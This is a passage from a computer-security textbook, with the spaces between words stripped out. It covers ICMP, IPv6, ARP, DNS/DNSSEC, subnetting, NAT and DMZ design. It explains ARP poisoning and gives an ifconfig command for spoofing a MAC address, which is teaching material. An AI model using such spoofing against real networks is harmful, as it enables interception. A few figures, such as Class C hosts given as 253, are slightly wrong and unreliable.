ICMPMessageCodesWithICMPpackets,therealmessageofthepacketiscontainedinthe“typeandcode”fields,notthedatafield.FollowingaresomeofthemorecommonlyseenICMPtypecodes.NotethatICMPv6hasbrokenthelistingintotwotypes:errormessages(0—127)andinformationalmessages(128—255,presentedinthelatterhalfofthetable).IPv6introducesmanynewprotocols,twoofwhichwillhavesignificantimplications:theNeighborDiscoveryProtocol(NDP),whichmanagestheinteractionsbetweenneighboringIPv6nodes,andMulticastListenerDiscovery(MLD),whichmanagesIPv6multicastgroups.
TechTip
Manyofthemessageshaveassociatedcodevaluesthatmakethemessagemorespecific.For
example,ICMPv4messageswithatypeof3canhaveanyofthefollowingcodes:
CrossCheckPingSweepInChapter1youlearnedabouta“pingsweep.”Whatisapingsweepandwhatisitusedfor?WhattypesofICMPpacketscouldyouusetoconductapingsweep?HowdoesthisdifferbetweenICMPv4andICMPv6?
TechTip
ShouldYouBlockICMP?ICMPisaprotocolusedfortroubleshooting,errorreporting,andawidevarietyofassociatedfunctionality.ThisfunctionalityexpandsinICMPv6intomulticasting.ICMPgotabadnameprimarilybecauseofissuesassociatedwithpingandtraceroutecommands,buttheserepresentatinyminorityoftheprotocolfunctionality.TherearenumerousimportantusesassociatedwithICMP,andblockingitinitsentiretyisabadpractice.Blockingspecificcommandsandspecificsourcesmakessense;blanketblockingisapoorpracticethatwillleadtonetworkinefficiencies.BlockingICMPv6initsentiretywillblockalotofIPv6functionalitybecauseICMPisnowanintegralpartoftheprotocolsuite.
IPv4vs.IPv6ThemostcommonversionofIPinuseisIPv4,butthereleaseofIPv6,spurredbythedepletionoftheIPv4addressspace,hasbegunatypicallogarithmicadoptioncurve.IPv6hasmanysimilaritiestothepreviousversion,butitalsohassignificantnewenhancements,manyofwhichhavesignificantsecurityimplications.
ExpandedAddressSpaceTheexpansionoftheaddressspacefrom32bitsto128bitsisasignificantchange.WhereIPv4didnothaveenoughaddressesforeachpersononearth,IPv6hasover1500addressespersquaremeteroftheentireearth’ssurface.Thishasoneimmediateimplication:whereyoucoulduseascannertosearchalladdressesforresponsesinIPv4,doingthesameinIPv6willtakesignificantlylonger.AonemillisecondscaninIPv4equatestoa2.5billionyearscaninIPv6.Intheory,the128bitsofIPv6addressspacewillexpress3.4×1038possiblenodes.TheIPv6addressingprotocolhasbeendesignedtoallowforahierarchaldivisionoftheaddressspaceintoseverallayersofsubnets,toassistinthemaintainingofbothefficientandlogicaladdressallocations.OneexampleistheembeddingoftheIPv4
addressspaceintheIPv6space.Thisalsohasanintentionaleffectofsimplifyingthebackboneroutinginfrastructuresbyreducingtheroutingtablesize.
TechTip
IPv6TopSecurityConcernsTherearenumerousIPv6securityconcerns,sometechnical,someoperational.Someofthetopsecurityconcernsare
LackofIPv6securitytraining/education.
SecuritydevicebypassviaIPv6.PoorIPv6securitypolicies.
Addressnotationmakesgreppingthroughlogsdifficultifnotimpossible.IPv6complexityincreasesoperationalchallengesforcorrectdeployment.
NetworkDiscoveryIPv6introducestheNetworkDiscovery(NDP)protocol,whichisusefulforauto-configurationofnetworks.NDPcanenableavarietyofinterceptionandinterruptionthreatmodes.Amalevolentroutercanattachitselftoanetworkandrerouteorinterrupttrafficflows.
BenefitsofIPv6Changeisalwaysadifficulttask,andwhenthechangewilltouchvirtuallyeverythinginyoursystem,thismakesitevenmoredifficult.ChangingfromIPv4toIPv6isnotasimpletask,foritwillhaveaneffectoneverynetworkedresource.Thegoodnewsisthatthisisnotasuddenorsurpriseprocess;vendorshavebeenmakingproductsIPv6capableforalmostadecade.Bythispoint,virtuallyallthenetworkequipmentyourelyuponwillbedual-stackcapable,meaningthattheycanoperateinbothIPv4andIPv6networks.ThisprovidesamethodforanorderlytransferfromIPv4
toIPv6.IPv6hasmanyusefulbenefitsandultimatelywillbemoresecure
becauseithasmanysecurityfeaturesbuiltintothebaseprotocolseries.IPv6hasasimplifiedpacketheaderandnewaddressingscheme.Thiscanleadtomoreefficientroutingthroughsmallerroutingtablesandfasterpacketprocessing.IPv6wasdesignedtoincorporatemulticastingflowsnatively,whichallowsbandwidth-intensivemultimediastreamstobesentsimultaneouslytomultipledestinations.IPv6hasahostofnewservices,fromauto-configurationtomobiledeviceaddressing,andserviceenhancementstoimprovetherobustnessofQoSandVoIPfunctions.ThesecuritymodelofIPv6isbakedintotheprotocol,andis
significantlyenhancedfromthenonexistentoneinIPv4.IPv6isdesignedtobesecurefromsendertoreceiver,withIPsecavailablenativelyacrosstheprotocol.Thiswillsignificantlyimprovecommunicationlevelsecurity,butithasalsodrawnalotofattention.TheuseofIPsecwillchangethewaysecurityfunctionsareperformedacrosstheenterprise.OldIPv4methods,suchasNATandpacketinspectionmethodsofIDS,willneedtobeadjustedtothenewmodel.Securityapplianceswillhavetoadapttothenewprotocolanditsenhancednature.
PacketDeliveryProtocolsaredesignedtohelpinformationgetfromoneplacetoanother,butinordertodeliverapacketwehavetoknowwhereitisgoing.Packetdeliverycanbedividedintotwosections:localandremote.Ethernetiscommonforlocaldelivery,whileIPworksforremotedelivery.Localpacketdeliveryappliestopacketsbeingsentoutonalocalnetwork,whileremotepacketdeliveryappliestopacketsbeingdeliveredtoaremotesystem,suchasacrosstheInternet.Ultimately,packetsmayfollowalocaldelivery–remotedelivery–localdeliverypatternbeforereachingtheirintendeddestination.Thebiggestdifferenceinlocalversusremotedeliveryishowpacketsareaddressed.Networksystemshaveaddresses,notunlikeofficenumbersorstreetaddresses,andbeforeapacketcanbe
successfullydelivered,thesenderneedstoknowtheaddressofthedestinationsystem.
TechTip
MACAddressesEverynetworkdeviceshouldhaveauniqueMACaddress.ManufacturersofnetworkcardsandnetworkchipsetshaveblocksofMACaddressesassignedtothem,soyoucanoftentellwhattypeofequipmentissendingpacketsbylookingatthefirstthreepairsofhexadecimaldigitsinaMACaddress.Forexample“00-00-0C”wouldindicatethenetworkdevicewasbuiltbyCiscoSystems.
EthernetEthernetisthemostwidelyimplementedLayer2protocol.EthernetisstandardizedunderIEEE802.3.Ethernetworksbyforwardingpacketsonahop-to-hopbasisusingMACaddresses.Layer2addressingcanhavenumeroussecurityimplications.Layer2addressescanbepoisoned,spanningtreealgorithmscanbeattacked,VLANscanbehopped,andmore.Becauseofitsnearubiquity,Ethernetisacommonattackvector.Ithasmanyelementsthatmakeitusefulfromanetworkingpointofview,suchasitsbroadcastnatureanditsabilitytorunoverawiderangeofmedia.Butthesecanalsoactagainstsecurityconcerns.Wirelessconnectionsarefrequentlyconsideredtobeweakfromasecuritypointofview,butsoshouldEthernet,forunlessyouownthenetwork,youshouldconsiderthenetworktobeatrisk.
LocalPacketDeliveryPacketsdeliveredonanetwork,suchasanofficeLAN,areusuallysentusingthedestinationsystem’shardwareaddress,orMediaAccessControl(MAC)address.Eachnetworkcardornetworkdeviceis
supposedtohaveauniquehardwareaddresssothatitcanbespecificallyaddressedfornetworktraffic.MACaddressesareassignedtoadeviceornetworkcardbythemanufacturer,andeachmanufacturerisassignedaspecificblockofMACaddressestopreventtwodevicesfromsharingthesameMACaddress.MACaddressesareusuallyexpressedassixpairsofhexadecimaldigits,suchas00:07:e9:7c:c8:aa.Inorderforasystemtosenddatatoanothersystemonthenetwork,itmustfirstfindoutthedestinationsystem’sMACaddress.
TryThis!FindingMACAddressesonWindowsSystemsOpenacommandpromptonaWindowssystem.Typethecommandipconfig/allandfindyoursystem’sMACaddress.Hint:Itshouldbelistedunder“PhysicalAddress”onyournetworkadapters.Nowtypethecommandarp–aandpressENTER.Whatinformationdoesthisdisplay?CanyoufindtheMACaddressofyourdefaultgateway?
Maintainingalistofeverylocalsystem’sMACaddressisbothcostlyandtimeconsuming,andalthoughasystemmaystoreMACaddressestemporarilyforconvenience,inmanycasesthesendermustfindthedestinationMACaddressbeforesendinganypackets.Tofindanothersystem’sMACaddress,theAddressResolutionProtocol(ARP)isused.Essentially,thisisthecomputer’swayoffindingout“whoownstheblueconvertiblewithlicensenumber123JAK.”Inmostcases,systemsknowtheIPaddresstheywishtosendto,butnottheMACaddress.UsinganARPrequest,thesendingsystemwillsendoutaquery:Whois10.1.1.140?Thisbroadcastqueryisexaminedbyeverysystemonthelocalnetwork,butonlythesystemwhoseIPaddressis10.1.1.140willrespond.Thatsystemwillsendbackaresponsethatsays“I’m10.1.1.140andmyMACaddressis00:07:e9:7c:c8:aa.”Thesendingsystemwillthenformatthepacketfordeliveryanddropitonthenetworkmedia,stampedwiththeMACaddressofthedestinationworkstation.
MACaddressescanbe“spoofed”orfaked.Someoperatingsystemsallowuserswithadministrator-levelprivilegestoexplicitlysettheMACaddressfortheirnetworkcard(s).Forexample,inLinuxoperatingsystemsyoucanusetheifconfigcommandtochangeanetworkadapter’sMACaddress.Thecommandifconfigeth0hwether00:07:e9:7c:c8:aawillsettheMACaddressofadaptereth0to00:07:e9:7c:c8:aa.TherearealsoanumberofsoftwareutilitiesthatallowyoutodothisthroughaGUI,suchastheGNUMACChanger.GUIutilitiestochangeMACaddressesonWindowssystemsarealsoavailable.
CrossCheckMandatoryAccessControlvs.MediaAccessControlInChapter2youlearnedaboutadifferentMAC—mandatoryaccesscontrol.WhatisthedifferencebetweenmandatoryaccesscontrolandMediaAccessControl?Whatiseachusedfor?Whenusingacronymsitcanbecriticaltoensureallpartiesareawareofthecontextoftheirusage.
ARPAttacksARPoperatesinasimplisticandefficientmanner—abroadcastrequestfollowedbyaunicastreply.ThismethodleavesARPopentoattack,whichinturncanresultinlossesofintegrity,confidentiality,andavailability.BecauseARPservestoestablishcommunicationchannels,failuresatthislevelcanleadtosignificantsystemcompromises.ThereisawiderangeofARP-specificattacks,butonecanclassifythemintotypesbasedoneffect.
TechTip
RogueDeviceDetectionThereisalwaysariskofarogue(unauthorized)devicebeinginsertedintothenetwork.Todetectwhenthishappens,maintainingalistofallauthorizedMACaddressescanhelpdetectthesedevices.AlthoughMACscanbecopiedandspoofed,thiswouldalsosetupaconflictif
theoriginaldevicewaspresent.Monitoringfortheseconditionscandetecttheinsertionofaroguedevice.
ARPcanbeavectoremployedtoachieveaman-in-the-middleattack.Therearemanyspecificwaystocreatefalseentriesinamachine’sARPcache,buttheeffectisthesame:communicationswillberoutedtoanattacker.ThistypeofattackiscalledARPpoisoning.Theattackercanusethismethodtoinjecthimselfintothemiddleofacommunication,hijackasession,snifftraffictoobtainpasswordsorothersensitiveitems,orblocktheflowofdata,creatingadenialofservice.AlthoughARPisnotsecure,allisnotlostwithmanyARP-based
attacks.Higher-levelpacketprotectionssuchasIPseccanbeemployedsothatthepacketsareunreadablebyinterlopers.ThisisoneofthesecuritygainsassociatedwithIPv6,becausewhensecurityisemployedattheIPseclevel,packetsareprotectedbelowtheIPlevel,makingLayer2attackslesssuccessful.
RemotePacketDeliveryWhilepacketdeliveryonaLANisusuallyaccomplishedwithMACaddresses,packetdeliverytoadistantsystemisusuallyaccomplishedusingInternetProtocol(IP)addresses.IPaddressesare32-bitnumbersthatusuallyareexpressedasagroupoffournumbers(suchas10.1.1.132).Inordertosendapackettoaspecificsystemontheothersideoftheworld,youhavetoknowtheremotesystem’sIPaddress.StoringlargenumbersofIPaddressesoneveryPCisfartoocostly,andmosthumansarenotgoodatrememberingcollectionsofnumbers.However,humansaregoodatrememberingnames,sotheDomainNameSystem(DNS)protocolwascreated.
DNSDNStranslatesnamesintoIPaddresses.Whenyouenterthenameofyourfavoritewebsiteintothelocationbarofyourwebbrowserandpress
ENTER,thecomputerhastofigureoutwhatIPaddressbelongstothatname.YourcomputertakestheenterednameandsendsaquerytoalocalDNSserver.Essentially,yourcomputeraskstheDNSserver,“WhatIPaddressgoeswithwww.myfavoritesite.com?”TheDNSserver,whosemainpurposeinlifeistohandleDNSqueries,looksinitslocalrecordstoseeifitknowstheanswer.Ifitdoesn’t,theDNSserverqueriesanother,higher-leveldomainserver.Thatserverchecksitsrecordsandqueriestheserveraboveit,andsoonuntilamatchisfound.Thatname-to−IPaddressmatchingispassedbackdowntoyourcomputersoitcancreatethewebrequest,stampitwiththerightdestinationIPaddress,andsendit.
TheDomainNameSystemiscriticaltotheoperationoftheInternet—ifyourcomputercan’ttranslatewww.espn.cominto68.71.212.159,thenyourwebbrowserwon’tbeabletoaccessthelatestscores.(AsDNSisadynamicsystem,theIPaddressmaychangeforwww.espn.com;youcancheckwiththetracertcommand.)
Beforesendingthepacket,yoursystemwillfirstdetermineifthedestinationIPaddressisonalocalorremotenetwork.Inmostcases,itwillbeonaremotenetworkandyoursystemwillnotknowhowtoreachthatremotenetwork.Again,itwouldnotbepracticalforyoursystemtoknowhowtodirectlyreacheveryothersystemontheInternet,soyoursystemwillforwardthepackettoanetworkgateway.Networkgateways,usuallycalledrouters,aredevicesthatareusedtointerconnectnetworksandmovepacketsfromonenetworktoanother.ThatprocessofmovingpacketsfromonenetworktoanotheriscalledroutingandiscriticaltotheflowofinformationacrosstheInternet.Toaccomplishthistask,routersuseforwardingtablestodeterminewhereapacketshouldgo.Whenapacketreachesarouter,therouterlooksatthedestinationaddresstodeterminewheretosendthepacket.Iftherouter’sforwardingtablesindicatewherethepacketshouldgo,theroutersendsthepacketoutalongtheappropriateroute.Iftherouterdoesnotknowwherethedestinationnetworkis,itforwardsthepackettoitsdefinedgateway,whichrepeatsthe
sameprocess.Eventually,aftertraversingvariousnetworksandbeingpassedthroughvariousrouters,yourpacketarrivesattherouterservingthenetworkwiththewebsiteyouaretryingtoreach.ThisrouterdeterminestheappropriateMACaddressofthedestinationsystemandforwardsthepacketaccordingly.
DNSSECBecauseofthecriticalfunctionDNSperformsandthesecurityimplicationsofDNS,acryptographicallysignedversionofDNSwascreated.DNSSECisanextensionoftheoriginalDNSspecification,makingittrustworthy.DNSisoneofthepillarsofauthorityassociatedwiththeInternet—itprovidestheaddressesusedbymachinesforcommunications.LackoftrustinDNSandtheinabilitytoauthenticateDNSmessagesdrovetheneedforandcreationofDNSSEC.TheDNSSECspecificationwasformallypublishedin2005,butsystem-wideadoptionhasbeenslow.In2008,DanKaminskyintroducedamethodofDNScachepoisoning,demonstratingtheneedforDNSSECadoption.AlthoughKaminskyworkedwithvirtuallyallmajorvendorsandwasbehindoneofthemostcoordinatedpatchrolloutsever,theneedforDNSSECstillremainsandenterprisesareslowtoadoptthenewmethods.Oneofthereasonsforslowadoptioniscomplexity.HavingDNSrequestsandrepliesdigitallysignedrequiressignificantlymoreworkandtheincreaseincomplexitygoesagainstthestabilitydesiresofnetworkengineers.DNSwasdesignedinthe1980swhenthethreatmodelwassubstantially
differentthantoday.TheInternettoday,anditsuseforallkindsofcriticalcommunications,needsatrustworthyaddressingmechanism.DNSSECisthatmechanism,andasitrollsout,itwillsignificantlyincreasetheleveloftrustassociatedwithaddresses.Althoughcertificate-baseddigitalsignaturesarenotperfect,thelevelofefforttocompromisethistypeofprotectionmechanismchangesthenatureoftheattackgame,makingitoutofreachtoallbutthemostresourcedplayers.ThecouplednatureofthetrustchainsinDNSalsoservestoalerttoanyinterveningattacks,makingattacksmuchhardertohide.
IPAddressesandSubnettingThelastsectionmentionedthatIPv4addressesare32-bitnumbers.Those32bitsarerepresentedasfourgroupsof8bitseach(calledoctets).YouwillusuallyseeIPaddressesexpressedasfoursetsofdecimalnumbersindotted-decimalnotation,10.120.102.15forexample.Ofthose32bitsinanIPaddress,someareusedforthenetworkportionoftheaddress(thenetworkID),andsomeareusedforthehostportionoftheaddress(thehostID).Subnettingistheprocessthatisusedtodividethose32bitsinanIPaddressandtellyouhowmanyofthe32bitsarebeingusedforthenetworkIDandhowmanyarebeingusedforthehostID.Asyoucanguess,whereandhowyoudividethe32bitsdetermineshowmanynetworksandhowmanyhostaddressesyoumayhave.Tointerpretthe32-bitspacecorrectly,wemustuseasubnetmask,whichtellsusexactlyhowmuchofthespaceisthenetworkportionandhowmuchisthehostportion.Let’slookatanexampleusingtheIPaddress10.10.10.101withasubnetmaskof255.255.255.0.
TechTip
HowDNSWorksDNSisahierarchicaldistributeddatabasestructureofnamesandaddresses.ThissystemisdelegatedfromrootserverstootherDNSserversthateachmanagelocalrequestsforinformation.Thetoplevelofauthorities,referredtoasauthoritativesources,maintainthecorrectauthoritativerecord.Asrecordschange,theyarepushedoutbetweenDNSservers,sorecordscanbemaintainedinasnearacurrentfashionaspossible.TransfersofDNSrecordsbetweenDNSserversarecalledDNSzonetransfers.Becausethesecanresultinmassivepoisoningattacks,zonetransfersneedtobetightlycontrolledbetweentrustedparties.Toavoidrequestcongestion,DNSresponsesarehandledbyamyriadoflowernameservers,referredtoasresolvers.Resolvershaveacounterthatrefreshestheirrecordafteratimelimithasbeenreached.Undernormaloperation,theDNSfunctionisatwo-stepprocess:
1.TheclientrequestsaDNSrecord.2.TheresolverreplieswithaDNSreply.
Iftheresolverisoutofdate,thestepsexpand:
1.TheclientrequestsaDNSrecord.2.Therecursiveresolverqueriestheauthoritativeserver.3.Theauthoritativeserverrepliestotherecursiveresolver.4.TherecursiveresolverreplieswithaDNSresponsetoclient.ForamoredetailedexplanationofDNS,checkoutDNSforRocketScientists,www.zytrax.com/books/dns/.
Firstwemustconverttheaddressandsubnetmasktotheirbinaryrepresentations:
SubnetMask:11111111.11111111.11111111.00000000IPAddress:00001010.00001010.00001010.01100101
Then,weperformabitwiseANDoperationtogetthenetworkaddress.ThebitwiseANDoperationexamineseachsetofmatchingbitsfromthebinaryrepresentationofthesubnetmaskandthebinaryrepresentationoftheIPaddress.Foreachsetwhereboththemaskandaddressbitsare1,theresultoftheANDoperationisa1.Otherwise,ifeitherbitisa0,theresultisa0.So,forourexampleweget
NetworkAddress:00001010.00001010.00001010.00000000
whichindecimalis10.10.10.0,thenetworkIDofourIPnetworkaddress(translatethebinaryrepresentationtodecimal).ThenetworkIDandsubnetmasktogethertellusthatthefirstthree
octetsofouraddressarenetwork-related(10.10.10.),whichmeansthatthelastoctetofouraddressisthehostportion(101inthiscase).Inourexample,thenetworkportionoftheaddressis10.10.10andthehostportionis101.Anothershortcutinidentifyingwhichofthe32bitsisbeingusedinthenetworkIDistolookatthesubnetmaskafterit’sbeenconvertedtoitsbinaryrepresentation.Ifthere’sa1inthesubnetmask,thenthecorrespondingbitinthebinaryrepresentationoftheIPaddressisbeingusedaspartofthenetworkID.Intheprecedingexample,thesubnetmaskof255.255.255.0inbinaryrepresentationis11111111.11111111.11111111.00000000.Wecanseethatthere’sa1inthefirst24spots,whichmeansthatthefirst24bitsoftheIPaddressare
beingusedasthenetworkID(whichisthefirstthreeoctetsof255.255.255).Networkaddressspacesareusuallydividedintooneofthreeclasses:
ClassASupports16,777,214hostsoneachnetworkwithadefaultsubnetmaskof255.0.0.0Subnets:0.0.0.0to126.255.255.255(127.0.0.0to127.255.255.255isreservedforloopback)
ClassBSupports65,534hostsoneachnetworkwithadefaultsubnetmaskof255.255.0.0Subnets:128.0.0.0to191.255.255.255
ClassCSupports253hostsoneachnetworkwithadefaultsubnetmaskof255.255.255.0(seeFigure9.10)Subnets:192.0.0.0to223.255.255.255
•Figure9.10Asubnetmaskof255.255.255.0indicatesthisisaClassCaddressspace.
Everythingabove224.0.0.0isreservedforeithermulticastingorfutureuse.
TechTip
RFC1918—PrivateAddressSpacesRFC1918isthetechnicalspecificationforprivateaddressspace.RFCstandsfor“RequestforComment”andthereareRFCsforjustabouteverythingtodowiththeInternet—protocols,routing,howtohandlee-mail,andsoon.YoucanfindRFCsatwww.ietf.org/rfc.html.
Inaddition,certainsubnetsarereservedforprivateuseandarenotroutedacrosspublicnetworkssuchastheInternet:
10.0.0.0to10.255.255.255
172.16.0.0to172.31.255.255
192.168.0.0to192.168.255.255
169.254.0.0to169.254.255.255(AutomaticPrivateIPAddressing)
Finally,whendeterminingthevalidhoststhatcanbeplacedonaparticularsubnet,youhavetokeepinmindthatthe“all0’s”addressofthehostportionisreservedforthenetworkaddressandthe“all1’s”addressofthehostportionisreservedforthebroadcastaddressofthatparticularsubnet.Againfromourearlierexample:
SubnetNetworkAddress:10.10.10.000001010.00001010.00001010.00000000
BroadcastAddress:10.10.10.25500001010.00001010.00001010.11111111
Intheirforwardingtables,routersmaintainlistsofnetworksandtheaccompanyingsubnetmask.Withthesetwopieces,theroutercanexamine
thedestinationaddressofeachpacketandthenforwardthepacketontotheappropriatedestination.Asmentionedearlier,subnettingallowsustodividenetworksinto
smallerlogicalunits,andweusesubnetmaskstodothis.Buthowdoesthiswork?RememberthatthesubnetmasktellsushowmanybitsarebeingusedtodescribethenetworkID—adjustingthesubnetmask(andthenumberofbitsusedtodescribethenetworkID)allowsustodivideanaddressspaceintomultiple,smallerlogicalnetworks.Let’ssayyouhaveasingleaddressspaceof192.168.45.0thatyouneedtodivideintomultiplenetworks.Thedefaultsubnetmaskis255.255.255.0,whichmeansyou’reusing24bitsasthenetworkIDand8bitsasthehostID.Thisgivesyou254differenthostaddresses.Butwhatifyouneedmorenetworksanddon’tneedasmanyhostaddresses?Youcansimplyadjustyoursubnetmasktoborrowsomeofthehostbitsandusethemasnetworkbits.Ifyouuseasubnetmaskof255.255.255.224,youareessentially“borrowing”thefirst3bitsfromthespaceyouwereusingtodescribehostIDsandusingthemtodescribethenetworkID.ThisgivesyoumorespacetocreatedifferentnetworksbutmeansthateachnetworkwillnowhavefeweravailablehostIDs.Witha255.255.255.224subnetmask,youcancreatesixdifferentsubnets,buteachsubnetcanonlyhave30uniquehostIDs.Ifyouborrow6bitsfromthehostIDportionanduseasubnetmaskof255.255.255.252,youcancreate62differentnetworksbuteachofthemcanonlyhavetwouniquehostIDs.
TryThis!CalculatingSubnetsandHostsGivenanetworkIDof192.168.10.Xandasubnetmaskof255.255.255.224,youshouldbeabletocreateeightnetworkswithspacefor30hostsoneachnetwork.Calculatethenetworkaddress,thefirstusableIPaddressinthatsubnet,andthelastusableIPaddressinthatsubnet.Hint:Thefirstnetworkwillbe192.168.10.0.ThefirstusableIPaddressinthatsubnetis192.168.10.1andthelastusableIPaddressinthatsubnetis192.168.10.30.
TechTip
DynamicHostConfigurationProtocolWhenanadministratorsetsupanetwork,theyusuallyassignIPaddressestosystemsinoneoftwoways:staticallyorthroughDHCP.AstaticIPaddressassignmentisfairlysimple;theadministratordecideswhatIPaddresstoassigntoaserverorPC,andthatIPaddressstaysassignedtothatsystemuntiltheadministratordecidestochangeit.TheotherpopularmethodisthroughtheDynamicHostConfigurationProtocol(DHCP).UnderDHCP,whenasystembootsuporisconnectedtothenetwork,itsendsoutaquerylookingforaDHCPserver.IfaDHCPserverisavailableonthenetwork,itanswersthenewsystemandtemporarilyassignstothenewsystemanIPaddressfromapoolofdedicated,availableaddresses.DHCPisan“asavailable”protocol—iftheserverhasalreadyallocatedalltheavailableIPaddressesintheDHCPpool,thenewsystemwillnotreceiveanIPaddressandwillnotbeabletoconnecttothenetwork.AnotherkeyfeatureofDHCPistheabilitytolimithowlongasystemmaykeepitsDHCP-assignedIPaddress.DHCPaddresseshavealimitedlifespan,andoncethattimeperiodexpires,thesystemusingthatIPaddressmusteitherrenewuseofthataddressorrequestanotheraddressfromtheDHCPserver.TherequestingsystemeithermayendupwiththesameIPaddressormaybeassignedacompletelynewaddress,dependingonhowtheDHCPserverisconfiguredandonthecurrentdemandforavailableaddresses.DHCPisverypopularinlargeuserenvironmentswherethecostofassigningandtrackingIPaddressesamonghundredsorthousandsofusersystemsisextremelyhigh.
NetworkAddressTranslationIfyou’rethinkingthata32-bitaddressspacethat’schoppedupandsubnettedisn’tenoughtohandleallthesystemsintheworld,you’reright.WhileIPv4addressblocksareassignedtoorganizationssuchascompaniesanduniversities,thereusuallyaren’tenoughInternet-visibleIPaddressestoassigntoeverysystemontheplanetaunique,Internet-routableIPaddress.TocompensateforthislackofavailableIPaddressspace,weuseNetworkAddressTranslation(NAT).NATtranslatesprivate(nonroutable)IPaddressesintopublic(routable)IPaddresses.Fromourdiscussionsearlierinthischapter,youmayrememberthat
certainIPaddressblocksarereservedfor“privateuse,”andyou’dprobablyagreethatnoteverysysteminanorganizationneedsadirect,Internet-routableIPaddress.Actually,forsecurityreasons,it’smuch
betterifmostofanorganization’ssystemsarehiddenfromdirectInternetaccess.MostorganizationsbuildtheirinternalnetworksusingtheprivateIPaddressranges(suchas10.1.1.X)topreventoutsidersfromdirectlyaccessingthoseinternalnetworks.However,inmanycasesthosesystemsstillneedtobeabletoreachtheInternet.ThisisaccomplishedbyusingaNATdevice(typicallyafirewallorrouter)thattranslatesthemanyinternalIPaddressesintooneofasmallnumberofpublicIPaddresses.Forexample,considerafictitiouscompany,ACME.com.ACMEhas
severalthousandinternalsystemsusingprivateIPaddressesinthe10.X.X.Xrange.ToallowthoseIPstocommunicatewiththeoutsideworld,ACMEleasesanInternetconnectionandafewpublicIPaddresses,anddeploysaNAT-capabledevice.ACMEadministratorsconfigurealltheirinternalhoststousetheNATdeviceastheirdefaultgateway.Wheninternalhostsneedtosendpacketsoutsidethecompany,theysendthemtotheNATdevice.TheNATdeviceremovestheinternalsourceIPaddressoutoftheoutboundpacketsandreplacesitwiththeNATdevice’spublic,routableaddressandsendsthemontheirway.Whenresponsepacketsarereceivedfromoutsidesources,thedeviceperformsNATinreverse,strippingofftheexternal,publicIPaddressinthedestinationaddressfieldandreplacingitwiththecorrectinternal,privateIPaddressinthedestinationaddressfieldandreplacingitwiththecorrectinternal,privateIPaddressbeforesendingitonintotheprivateACME.comnetwork.Figure9.11illustratesthisNATprocess.
•Figure9.11LogicaldepictionofNAT
TechTip
DifferentApproachesforImplementingNATWhiletheconceptofNATremainsthesame,thereareactuallyseveraldifferentapproachestoimplementingNAT.Forexample:
StaticNATMapsaninternal,privateaddresstoanexternal,publicaddress.Thesamepublicaddressisalwaysusedforthatprivateaddress.Thistechniqueisoftenusedwhenhostingsomethingyouwishthepublictobeabletogetto,suchasawebserver,behindafirewall.
DynamicNATMapsaninternal,privateIPaddresstoapublicIPaddressselectedfromapoolofregistered(public)IPaddresses.Thistechniqueisoftenusedwhentranslatingaddressesforend-userworkstationsandtheNATdevicemustkeeptrackofinternal/externaladdressmappings.
PortAddressTranslation(PAT)Allowsmanydifferentinternal,privateaddressestoshareasingleexternalIPaddress.DevicesperformingPATreplacethesourceIPaddress
withtheNATIPaddressandreplacethesourceportfieldwithaportfromanavailableconnectionpool.PATdeviceskeepatranslationtabletotrackwhichinternalhostsareusingwhichportssothatsubsequentpacketscanbestampedwiththesameportnumber.Whenresponsepacketsarereceived,thePATdevicereversestheprocessandforwardsthepackettothecorrectinternalhost.PATisaverypopularNATtechniqueandinuseatmanyorganizations.
InFigure9.11,weseeanexampleofNATbeingperformed.Aninternalworkstation(10.10.10.12)wantstovisittheESPNwebsiteatwww.espn.com(68.71.212.159).WhenthepacketreachestheNATdevice,thedevicetranslatesthe10.10.10.12sourceaddresstothegloballyroutable63.69.110.110address,theIPaddressofthedevice’sexternallyvisibleinterface.WhentheESPNwebsiteresponds,itrespondstothedevice’saddressjustasiftheNATdevicehadoriginallyrequestedtheinformation.TheNATdevicemustthenrememberwhichinternalworkstationrequestedtheinformationandroutethepackettotheappropriatedestination.
SecurityZonesThefirstaspectofsecurityisalayereddefense.Justasacastlehasamoat,anoutsidewall,aninsidewall,andevenakeep,so,too,doesamodernsecurenetworkhavedifferentlayersofprotection.Differentzonesaredesignedtoprovidelayersofdefense,withtheoutermostlayersprovidingbasicprotectionandtheinnermostlayersprovidingthehighestlevelofprotection.Aconstantissueisthataccessibilitytendstobeinverselyrelatedtolevelofprotection,soitismoredifficulttoprovidecompleteprotectionandunfetteredaccessatthesametime.Trade-offsbetweenaccessandsecurityarehandledthroughzones,withsuccessivezonesguardedbyfirewallsenforcingever-increasinglystrictsecuritypolicies.TheoutermostzoneistheInternet,afreearea,beyondanyspecificcontrols.Betweentheinner,securecorporatenetworkandtheInternetisanareawheremachinesareconsideredatrisk.ThiszonehascometobecalledtheDMZ,afteritsmilitarycounterpart,thedemilitarizedzone,
whereneithersidehasanyspecificcontrols.Onceinsidetheinner,securenetwork,separatebranchesarefrequentlycarvedouttoprovidespecificfunctionality;underthisheading,wewillalsodiscussintranets,extranets,flatnetworks,enclaves,virtualLANs(VLANs),andzonesandconduits.
DMZTheDMZisamilitarytermforgroundseparatingtwoopposingforces,byagreementandforthepurposeofactingasabufferbetweenthetwosides.ADMZinacomputernetworkisusedinthesameway;itactsasabufferzonebetweentheInternet,wherenocontrolsexist,andtheinner,securenetwork,whereanorganizationhassecuritypoliciesinplace(seeFigure9.12).Todemarcatethezonesandenforceseparation,afirewallisusedoneachsideoftheDMZ.Theareabetweenthesefirewallsisaccessiblefromeithertheinner,securenetworkortheInternet.Figure9.12illustratesthesezonesascausedbyfirewallplacement.ThefirewallsarespecificallydesignedtopreventaccessacrosstheDMZdirectly,fromtheInternettotheinner,securenetwork.ItisimportanttonotethattypicallyonlyfilteredInternettrafficisallowedintotheDMZ.Forexample,anorganizationhostingawebserverandanFTPserverinitsDMZmaywantthepublictobeableto“see”thoseservicesbutnothingelse.InthatcasethefirewallmayallowFTP,HTTP,andHTTPStrafficintotheDMZfromtheInternetandthenfilterouteverythingelse.
•Figure9.12TheDMZandzonesoftrust
SpecialattentionshouldbepaidtothesecuritysettingsofnetworkdevicesplacedintheDMZ,andtheyshouldbeconsideredatalltimestobeatriskforcompromisebyunauthorizeduse.Acommonindustryterm,hardenedoperatingsystem,appliestomachineswhosefunctionalityislockeddowntopreservesecurity—unnecessaryservicesandsoftwareareremovedordisabled,functionsarelimited,andsoon.ThisapproachneedstobeappliedtothemachinesintheDMZ,andalthoughitmeansthattheirfunctionalityislimited,suchprecautionsensurethatthemachineswillworkproperlyinaless-secureenvironment.Manytypesofserversbelonginthisarea,includingwebserversthatare
